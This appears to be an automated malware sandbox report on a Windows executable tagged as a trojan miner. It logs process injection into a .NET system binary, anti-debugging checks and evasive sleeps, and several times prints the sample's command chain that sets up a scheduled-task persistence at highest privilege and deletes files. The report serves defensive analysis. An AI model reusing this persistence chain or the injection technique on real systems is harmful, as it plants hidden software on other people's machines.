Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02AC1DB0
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02A78D80
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02AC3D80
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02ACC5E0
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02ACFD20
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02ACCD20
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02AD1570
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeCode function: 18_2_01040FA0
Source: QHSgso4hXH.exe, 00000000.00000003.271687790.000000000C196000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMiner.exe2 vs QHSgso4hXH.exe
Source: QHSgso4hXH.exe, 00000000.00000003.268964870.000000000C190000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMiner.exe2 vs QHSgso4hXH.exe
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeSection loaded: mscorsvc.dll
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeSection loaded: mscorsvc.dll
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeSection loaded: mscorsvc.dll
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeSection loaded: mscorsvc.dll
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe CA003ECD9A6CAAE17824816D1D869173510B2EB3C13F62E1A5615F1DA64F9676
Source: QHSgso4hXH.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: QHSgso4hXH.exeReversingLabs: Detection: 32%
Source: QHSgso4hXH.exeVirustotal: Detection: 34%
Source: QHSgso4hXH.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\QHSgso4hXH.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Users\user\Desktop\QHSgso4hXH.exe C:\Users\user\Desktop\QHSgso4hXH.exe
Source: C:\Users\user\Desktop\QHSgso4hXH.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "ngentask" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe" &&START "" "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "ngentask" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe" /rl HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe"
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe C:\Users\user\AppData\Local\ServiceHub\ngentask.exe
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe C:\Users\user\AppData\Local\ServiceHub\ngentask.exe
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe C:\Users\user\AppData\Local\ServiceHub\ngentask.exe
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\QHSgso4hXH.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "ngentask" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe" &&START "" "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "ngentask" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe" /rl HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe"
Source: C:\Users\user\Desktop\QHSgso4hXH.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile created: C:\Users\user\AppData\Local\ServiceHubJump to behavior
Source: C:\Users\user\Desktop\QHSgso4hXH.exeFile created: C:\Users\user\AppData\Local\Temp\advapi32.dllJump to behavior
Source: classification engineClassification label: mal88.troj.evad.winEXE@21/3@2/2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_00405660 GetDiskFreeSpaceW,_malloc,_malloc,_fwprintf_s,_wprintf,_fputc,
Source: ngentask.exe.1.dr, Win32Native.csTask registration methods: 'CreateProcessAsUser', 'CreateEvent', 'CreateEnvironmentBlock', 'CreateFile'
Source: ngentask.exe.1.dr, TaskHelper.csTask registration methods: 'CorCreateNGenProcess'
Source: 8.0.ngentask.exe.6d0000.0.unpack, Win32Native.csTask registration methods: 'CreateProcessAsUser', 'CreateEvent', 'CreateEnvironmentBlock', 'CreateFile'
Source: 8.0.ngentask.exe.6d0000.0.unpack, TaskHelper.csTask registration methods: 'CorCreateNGenProcess'
Source: 1.0.ngentask.exe.400000.0.unpack, ao.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 1.0.ngentask.exe.400000.0.unpack, ao.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.3.QHSgso4hXH.exe.c190000.0.unpack, ao.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 0.3.QHSgso4hXH.exe.c190000.0.unpack, ao.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.3.QHSgso4hXH.exe.c190000.1.unpack, ao.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 0.3.QHSgso4hXH.exe.c190000.1.unpack, ao.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5608:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6048:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4484:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5824:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeMutant created: \Sessions\1\BaseNamedObjects\ndhzlmhiae
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4912:120:WilError_01
Source: C:\Users\user\Desktop\QHSgso4hXH.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\QHSgso4hXH.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\QHSgso4hXH.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: QHSgso4hXH.exeStatic file information: File size 1138176 > 1048576
Source: Binary string: NGenTask.pdb source: ngentask.exe, 00000008.00000000.291902355.00000000006D2000.00000002.00000001.01000000.00000008.sdmp, ngentask.exe.1.dr
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_00401090 push ss; ret
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_0040516F pushad ; ret
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_00404139 push edx; ret
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_004039A1 push ebx; ret
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_00403ABC push ss; retf
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_00403B64 push es; retf
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_00401448 push ds; ret
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_004076C5 push ecx; ret
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_00402ABD LoadLibraryW,GetProcAddress,VirtualProtect,GetProcAddress,GlobalFree,
Source: initial sampleStatic PE information: section name: .text entropy: 7.8950275690936
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile created: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeJump to dropped file

Boot Survival

barindex
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "ngentask" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe" /rl HIGHEST /f
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe TID: 2588Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe TID: 5812Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe TID: 6040Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe TID: 5428Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe TID: 5396Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\QHSgso4hXH.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\QHSgso4hXH.exeProcess information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_00407092 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_00402ABD LoadLibraryW,GetProcAddress,VirtualProtect,GetProcAddress,GlobalFree,
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02A24340 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02A24340 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02A244D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_02A244D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\QHSgso4hXH.exeProcess queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeMemory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_00407092 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_00409142 SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\QHSgso4hXH.exeCode function: 0_2_00405705 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\QHSgso4hXH.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000
Source: C:\Users\user\Desktop\QHSgso4hXH.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: DA2008
Source: C:\Users\user\Desktop\QHSgso4hXH.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000 protect: page read and write
Source: C:\Users\user\Desktop\QHSgso4hXH.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "ngentask" /sc minute /tr "c:\users\user\appdata\local\servicehub\ngentask.exe" /rl highest /f && del /f /s /q /a "c:\windows\microsoft.net\framework\v4.0.30319\ngentask.exe" &&start "" "c:\users\user\appdata\local\servicehub\ngentask.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "ngentask" /sc minute /tr "c:\users\user\appdata\local\servicehub\ngentask.exe" /rl highest /f && del /f /s /q /a "c:\windows\microsoft.net\framework\v4.0.30319\ngentask.exe" &&start "" "c:\users\user\appdata\local\servicehub\ngentask.exe
Source: C:\Users\user\Desktop\QHSgso4hXH.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "ngentask" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe" &&START "" "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "ngentask" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe" /rl HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeQueries volume information: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe VolumeInformation
Source: C:\Users\user\AppData\Local\ServiceHub\ngentask.exeQueries volume information: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe VolumeInformation
